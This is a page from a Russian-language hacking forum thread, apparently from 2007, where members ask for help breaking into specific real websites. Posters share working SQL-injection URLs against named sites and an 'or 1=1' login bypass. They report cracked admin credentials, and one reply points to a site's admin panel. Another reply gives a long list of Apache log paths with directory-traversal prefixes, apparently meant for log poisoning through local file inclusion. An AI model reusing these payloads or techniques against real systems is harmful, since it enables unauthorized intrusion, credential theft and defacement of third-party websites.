ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 54 из 1393 « Первая < 444 50 51 52 53 54 55 56 57 58 641041545541054 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #531  
Старый 20.12.2007, 11:13
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию
Гхм. Нашел.
Админ - halbot
Авторизовался как halbot : 'or 1=1/*
А как ' or 999=999/* Не получилось.
Самое интересное, что когда авторизуюсь под левым ником никакая информация не выскакивает. Один емейл тип zz@zz и все.
Акк админа то есть, но входа в админку там нет.
 

  #532  
Старый 20.12.2007, 21:24
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку найти не могу....помагите найти плизз))
 

  #533  
Старый 21.12.2007, 02:22
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию
Не могу раскрутить =\ :
Код HTML:
Database error with query: [SELECT s1.id as parent_id, s1.title as parent_title FROM sections as s LEFT JOIN sections as s1 on s.parent_id=s1.id WHERE s.id=]: error 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/sinaius2/public_html/evreimir/article.php on line 41
(http://www.evreimir.com/article.php?id=-12032&res=1)

Кроме этого:

Код HTML:
http://www.rudtp.ru/articles.php?id=44+ORDER+BY+7/*
Все норм, а так:
Код HTML:
http://www.rudtp.ru/articles.php?id=44+UNION+SELECT+1,2,3,4,5,6,7/*
Ошибка. Почему?
Последний раз редактировалось ~EviL~; 21.12.2007 в 02:30..
 

  #534  
Старый 21.12.2007, 15:28
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию
Цитата:
http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку найти не могу....помагите найти плизз))
http://www.tymoshchuk.com/priv/index.php
в админке ни чего интересного..
PS
задефейсиш - запинаю.
 

  #535  
Старый 21.12.2007, 16:26
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Цитата:
Сообщение от ~EviL~  
http://www.evreimir.com/article.php?id=-12032&res=1
у меня вобще не загружается
Цитата:
Сообщение от ~EviL~  
Кроме этого:

Код HTML:
http://www.rudtp.ru/articles.php?id=44+ORDER+BY+7/*
Все норм, а так:
Код HTML:
http://www.rudtp.ru/articles.php?id=44+UNION+SELECT+1,2,3,4,5,6,7/*
Ошибка. Почему?
http://www.rudtp.ru/articles.php?id=44+and+substring(version(),1,1)=3

в третьей ветке не предусмотрено использование конструкции union select
__________________
Карфаген должен быть разрушен...
 

  #536  
Старый 22.12.2007, 12:08
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию
Подскажите, пожалуйста, пути к логам апача. Где сохраняются параметры refferer, user-agent и др... Чем больше вариантов тем лучше.
 

  #537  
Старый 23.12.2007, 09:30
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию
AFoST /logs/access.log
 

  #538  
Старый 24.12.2007, 10:21
4Dfx
Новичок
Регистрация: 06.12.2007
Сообщений: 11
Провел на форуме:
120052

Репутация: 30
Отправить сообщение для 4Dfx с помощью ICQ
По умолчанию
Цитата:
Сообщение от AFoST  
Подскажите, пожалуйста, пути к логам апача. Где сохраняются параметры refferer, user-agent и др... Чем больше вариантов тем лучше.
Цитата:
../logs/error.log
../logs/access.log
../../logs/error.log
../../logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
Вот возможные пути.
 

  #539  
Старый 24.12.2007, 22:29
DEMIX
Познающий
Регистрация: 17.06.2007
Сообщений: 39
Провел на форуме:
197892

Репутация: 11
По умолчанию
Искал на сайте уязвимость и вот что мне выдало:

Код:
Query: 'SELECT id,id2 FROM forum,player WHERE id=1_id AND id_1=9 ORDER BY is_announce DESC, last_reply_time DESC LIMIT -2570, 10' failed...

Что-то не та ошыбка которая должна быть. Здесь есть уязвимость или нет??? Если да то почему я немогу подобрать таблицу.
 

  #540  
Старый 24.12.2007, 22:40
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482

Репутация: 1796
По умолчанию
Цитата:
Сообщение от DEMIX  
Искал на сайте уязвимость и вот что мне выдало:

Код:
Query: 'SELECT id,id2 FROM forum,player WHERE id=1_id AND id_1=9 ORDER BY is_announce DESC, last_reply_time DESC LIMIT -2570, 10' failed...

Что-то не та ошыбка которая должна быть. Здесь есть уязвимость или нет??? Если да то почему я немогу подобрать таблицу.
Ну если я правильно понял то "-2570"- какой то третий параметр который ты можешь изменять...
Уязвимость есть, но что либо сделать путного ты не сможешь к сожлению так как перед этим стоит order by...
__________________
Кто я?..
Последний раз редактировалось I-I()/Ib; 24.12.2007 в 23:01.. Причина: немного напутал...
 
 
Страница 54 из 1393 « Первая < 444 50 51 52 53 54 55 56 57 58 641041545541054 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ